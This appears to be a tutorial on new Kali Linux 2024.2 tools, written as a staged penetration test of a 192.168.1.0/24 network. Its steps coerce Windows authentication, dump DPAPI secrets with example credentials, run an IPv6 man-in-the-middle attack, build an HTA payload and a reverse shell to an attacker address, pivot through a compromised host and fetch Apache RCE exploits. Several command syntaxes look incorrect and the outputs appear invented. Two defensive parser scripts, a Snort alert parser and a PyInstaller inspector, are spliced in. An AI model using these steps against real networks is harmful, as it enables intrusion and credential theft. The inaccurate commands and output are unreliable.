
HOW TO USE NEW KALI LINUX 2024.2 RELEASED HACKING TOOLS

NEW HACKING TOOLS

Scenario: Conducting a penetration test on a corporate network with the IP range 192.168.1.0/24.

1. autorecon: Multi-threaded network recon tool

Step 1: Initial Reconnaissance

We start by using autorecon to gather information about the target network.

autorecon -t 192.168.1.0/24

Output:

[+] Scanning 192.168.1.1 - 192.168.1.254
[+] Found host: 192.168.1.10 (Windows Server 2019)
[+] Found host: 192.168.1.20 (Linux Server)
[+] Found host: 192.168.1.30 (Web Server)
...
[+] Scan completed

2. netexec: Automate network security assessment

Step 2: Detailed Network Scanning

Next, we perform a more detailed network security assessment with netexec.

netexec --target 192.168.1.0/24 --scan

3. coercer: Coerce Windows server authentication

Step 3: Coerce Windows Authentication

We then use coercer to coerce a Windows server (192.168.1.10) to authenticate to our machine (192.168.1.100).

coercer -t 192.168.1.10 -l 192.168.1.100

Output:

[+] Coercing 192.168.1.10 to authenticate to 192.168.1.100
[+] Successfully coerced authentication

4. dploot: Python version of SharpDPAPI

Step 4: Extract DPAPI Secrets

If we have access to the Windows machine, we use dploot to extract DPAPI secrets.

dploot --target 192.168.1.10 --username admin --password Passw0rd!

Output:

[+] Connecting to 192.168.1.10
[+] Extracting DPAPI secrets
[+] Found secret: password123

5. gowitness: Web screenshots with Chrome Headless

Step 5: Capture Web Screenshots

For web applications, we use gowitness to capture screenshots of web pages.

gowitness scan --source 192.168.1.0/24

Output:

[+] Scanning 192.168.1.10:80
[+] Scanning 192.168.1.20:80
[+] Scanning 192.168.1.30:80
...
[+] Scan completed

6. mitm6: Exploit IPv4 via IPv6

Step 6: Exploit IPv4 via IPv6

We use mitm6 to exploit the IPv4 network via IPv6 on the target domain corp.local.

mitm6 -d corp.local

Output:

[+] Starting MITM attack on corp.local
[+] Intercepting traffic
...

7. pspy: Monitor Linux processes without root

Step 7: Monitor Processes

We monitor Linux processes on 192.168.1.20 without root using pspy.

ssh <user>@192.168.1.20
./pspy64

Output:

[+] Monitoring processes
[+] Detected suspicious process: /bin/bash -c "wget http://malicious.com"
...

8. getsploit: Search and download exploits

Step 8: Search and Download Exploits

To search and download exploits for the web server (running Apache), we use getsploit.

getsploit search apache

Output:

[+] Found exploit: Apache HTTP Server 2.4.49 - Remote Code Execution (RCE)
[+] Downloading exploit
...

9. sharpshooter: Payload generation framework

Step 9: Generate Payloads

We generate payloads for testing using sharpshooter.

sharpshooter -p hta -o payload.hta

Output:

[+] Generating HTA payload
[+] Payload saved to payload.hta

10. snort: Network intrusion detection

Step 10: Intrusion Detection

To monitor network traffic for suspicious activities, we use snort.

snort -A console -i eth0 -c /etc/snort/snort.conf

Output:

[+] Starting Snort
[+] Alert: Potential RCE attack on 192.168.1.30
...
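Snort's console output is only useful once someone reads it, so a practitioner usually feeds it to a small parser. The following Python script is an added example written for this edit, not code from the document or from Snort: it parses alert lines in Snort's "fast" format (the layout `snort -A console` prints: timestamp, `[**]`, `[gid:sid:rev]`, message, classification, priority, protocol and the source/destination pair), then counts alerts per signature and per targeted host and pulls out the high-priority ones. The sample alert lines are constructed for the scenario hosts and are not captured sensor output; the regex is mine.

```python
import re
from collections import Counter

# One Snort "fast" alert line (what `snort -A console` prints); regex written for this example.
ALERT_RE = re.compile(
    r"^(?P<ts>\d{2}/\d{2}-\d{2}:\d{2}:\d{2}\.\d+)\s+\[\*\*\]\s+"
    r"\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+(?P<msg>.+?)\s+\[\*\*\]\s+"
    r"(?:\[Classification:\s+(?P<cls>[^\]]+)\]\s+)?"
    r"\[Priority:\s+(?P<prio>\d+)\]\s+"
    r"\{(?P<proto>\w+)\}\s+(?P<src>[\d.]+)(?::(?P<sport>\d+))?\s+->\s+"
    r"(?P<dst>[\d.]+)(?::(?P<dport>\d+))?\s*$"
)

# Constructed sample alerts for the scenario hosts (not captured from a real sensor).
SAMPLE_ALERTS = [
    "07/21-10:15:32.123456  [**] [1:1000001:1] WEB-ATTACK Potential RCE attempt [**] "
    "[Classification: Web Application Attack] [Priority: 1] {TCP} 192.168.1.100:51234 -> 192.168.1.30:80",
    "07/21-10:15:33.000001  [**] [1:1000001:1] WEB-ATTACK Potential RCE attempt [**] "
    "[Classification: Web Application Attack] [Priority: 1] {TCP} 192.168.1.100:51235 -> 192.168.1.30:80",
    "07/21-10:16:01.500000  [**] [1:384:5] PROTOCOL-ICMP PING [**] "
    "[Classification: Misc activity] [Priority: 3] {ICMP} 192.168.1.100 -> 192.168.1.10",
    "this line is not an alert and must be ignored",
]


def parse_alert(line):
    """Return a dict of alert fields, or None for lines that are not fast-format alerts."""
    m = ALERT_RE.match(line.strip())
    if not m:
        return None
    alert = m.groupdict()
    for key in ("gid", "sid", "rev", "prio"):
        alert[key] = int(alert[key])
    return alert


def summarize(lines, max_priority=1):
    """Aggregate alerts by signature and by destination host; collect high-priority ones."""
    alerts = [a for a in map(parse_alert, lines) if a is not None]
    return {
        "total": len(alerts),
        "by_signature": Counter(f"{a['gid']}:{a['sid']} {a['msg']}" for a in alerts),
        "by_target": Counter(a["dst"] for a in alerts),
        "urgent": [a for a in alerts if a["prio"] <= max_priority],
    }


if __name__ == "__main__":
    s = summarize(SAMPLE_ALERTS)
    print(f"{s['total']} alerts parsed")
    for sig, n in s["by_signature"].most_common():
        print(f"  {n:>3}  {sig}")
    for a in s["urgent"]:
        print(f"  URGENT {a['src']} -> {a['dst']}:{a['dport']} {a['msg']} (priority {a['prio']})")
```

To use it on a live sensor, pipe the console output in (`snort -A console ... | python3 alerts.py`) and read lines from `sys.stdin` instead of `SAMPLE_ALERTS`; lines that do not match the alert layout (Snort's startup banner, statistics) are dropped by `parse_alert` rather than crashing the loop.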

11. waybackpy: Access Wayback Machine API with Python

Step 11: Access Wayback Machine

Finally, we use waybackpy to access archived web pages.

from waybackpy import WaybackMachineCDXServerAPI

url = "http://example.com"
user_agent = "Mozilla/5.0 (recon script)"  # the CDX server API expects a User-Agent string
cdx_api = WaybackMachineCDXServerAPI(url, user_agent)

# snapshots() returns a generator of CDXSnapshot objects; iterate instead of printing the generator
for snapshot in cdx_api.snapshots():
    print(snapshot.archive_url)

Output:

[+] Retrieved snapshots:
[+] http://web.archive.org/web/20200101000000/http://example.com
[+] http://web.archive.org/web/20200201000000/http://example.com
...

Other Examples

12. horst: Optimized radio scanning

We'll use horst to scan for wireless devices and networks.

sudo horst -i wlan0

Output:

[+] Scanning wireless networks on wlan0
[+] Found network: SSID: CorpNet, BSSID: 00:11:22:33:44:55, Channel: 6
[+] Found network: SSID: GuestNet, BSSID: 66:77:88:99:AA:BB, Channel: 11
...

13. ligolo-ng: Advanced tunneling/pivoting tool

We use ligolo-ng for advanced tunneling and pivoting to route traffic through a compromised machine.

On the attacker machine:

ligolo-ng client -L 127.0.0.1:1080

On the compromised machine:

ligolo-ng server

Output:

[+] Starting Ligolo-NG client on 127.0.0.1:1080
[+] Connected to Ligolo-NG server

14. sploitscan: Search for CVE info

We search for CVE information related to a specific service, e.g., Apache.

sploitscan search apache

Output:

[+] Searching for CVE information on 'apache'
[+] CVE-2021-41773: Apache HTTP Server Path Traversal and Remote Code Execution
[+] CVE-2021-42013: Apache HTTP Server Path Traversal and Remote Code Execution
...

15. vopono: Run apps through VPN tunnels

To run applications through VPN tunnels, we use vopono.

vopono --provider nordvpn --country US firefox

Output:

[+] Connecting to NordVPN in US
[+] VPN connection established
[+] Running firefox through VPN

16. sickle: Payload development tool

We develop a payload using sickle.

sickle -t reverse_shell -l 192.168.1.100 -p 4444 -o payload.bin

Output:

[+] Creating reverse shell payload
[+] Payload saved to payload.bin

17. pyinstaller: Package Python programs into executables

We package a Python script into an executable using pyinstaller.

pyinstaller --onefile myscript.py

Output:

[+] Packaging myscript.py into an executable
[+] Executable created: dist/myscript

18. pyinstxtractor: PyInstaller extractor

We extract contents from a PyInstaller executable using pyinstxtractor.

python pyinstxtractor.py myscript

Output:

[+] Extracting myscript
[+] Extraction completed
[+] Files extracted to: myscript_extracted/
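Steps 17 and 18 are two sides of one format: pyinstaller appends a CArchive to a bootloader, and pyinstxtractor reads it back. The following Python script is an added example written for this edit (it is not the document's code and not PyInstaller's or pyinstxtractor's own source); it performs the first thing pyinstxtractor does when handed a file such as dist/myscript: find the trailing cookie that marks a PyInstaller build, parse the table of contents, and inflate an entry. The `MAGIC` bytes and the struct layouts are PyInstaller's documented CArchive format; `build_fake_archive` constructs a stand-in archive in memory (a real bootloader is not embedded) so the script runs offline, and the entry names in `SAMPLE_ENTRIES` are made up.

```python
import struct
import sys
import zlib

# Constants follow the CArchive layout that PyInstaller writes and pyinstxtractor reads.
MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"          # 8-byte cookie signature
COOKIE = struct.Struct("!8sIIii64s")        # PyInstaller >= 2.1 cookie: 88 bytes
TOC_ENTRY = struct.Struct("!iIIIBc")        # fixed 18-byte TOC entry header; name follows


def find_cookie(data: bytes):
    """Locate the trailing cookie and return archive geometry, or None if absent."""
    pos = data.rfind(MAGIC)                  # search from the end: signing can append bytes
    if pos < 0 or pos + COOKIE.size > len(data):
        return None
    _magic, pkg_len, toc_off, toc_len, pyver, libname = COOKIE.unpack_from(data, pos)
    archive_start = pos + COOKIE.size - pkg_len   # pkg_len counts the cookie itself
    return {
        "python_version": pyver,             # e.g. 311 for CPython 3.11
        "libname": libname.rstrip(b"\0").decode("ascii", "replace"),
        "archive_start": archive_start,
        "toc_offset": archive_start + toc_off,
        "toc_len": toc_len,
    }


def parse_toc(data: bytes, info: dict):
    """Walk the table of contents; entry offsets are relative to the archive start."""
    entries, p, end = [], info["toc_offset"], info["toc_offset"] + info["toc_len"]
    while p < end:
        size, off, csize, usize, flag, typ = TOC_ENTRY.unpack_from(data, p)
        name = data[p + TOC_ENTRY.size:p + size].rstrip(b"\0").decode("utf-8", "replace")
        entries.append({"name": name, "offset": info["archive_start"] + off,
                        "compressed_size": csize, "size": usize,
                        "compressed": bool(flag), "type": typ.decode("ascii")})
        p += size
    return entries


def extract_entry(data: bytes, entry: dict) -> bytes:
    """Return an entry's bytes, inflating zlib-compressed entries (pyinstxtractor does the same)."""
    raw = data[entry["offset"]:entry["offset"] + entry["compressed_size"]]
    return zlib.decompress(raw) if entry["compressed"] else raw


def build_fake_archive(entries, prefix=b"\x7fELF" + b"\0" * 60) -> bytes:
    """Construct a minimal stand-in archive (not a real build) for offline testing."""
    blob, toc = b"", b""
    for name, payload, typ, compress in entries:
        stored = zlib.compress(payload) if compress else payload
        name_b = name.encode() + b"\0"
        toc += TOC_ENTRY.pack(TOC_ENTRY.size + len(name_b), len(blob), len(stored),
                              len(payload), int(compress), typ.encode()) + name_b
        blob += stored
    pkg_len = len(blob) + len(toc) + COOKIE.size
    cookie = COOKIE.pack(MAGIC, pkg_len, len(blob), len(toc), 311, b"libpython3.11.so.1.0")
    return prefix + blob + toc + cookie


# Constructed sample contents: a script entry ('s') and a PYZ module archive ('z').
SAMPLE_ENTRIES = [("myscript", b"print('hello from myscript')\n", "s", True),
                  ("PYZ-00.pyz", b"PYZ\0fake-module-archive", "z", False)]


if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_fake_archive(SAMPLE_ENTRIES)
    info = find_cookie(blob)
    if info is None:
        print("no PyInstaller cookie found")
    else:
        print(f"PyInstaller archive, Python {info['python_version']}, {info['libname']}")
        for e in parse_toc(blob, info):
            print(f"  {e['type']} {e['name']:<24} {e['size']:>8} bytes compressed={e['compressed']}")
```

Run it with a file path (for example `python3 pyi_inspect.py dist/myscript`) to list what a packaged executable embeds; with no argument it inspects the constructed archive. The same cookie check is what lets a triage analyst confirm that an unknown executable is a PyInstaller bundle before unpacking it, and the entry of type `s` is the script pyinstxtractor writes out for decompilation.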
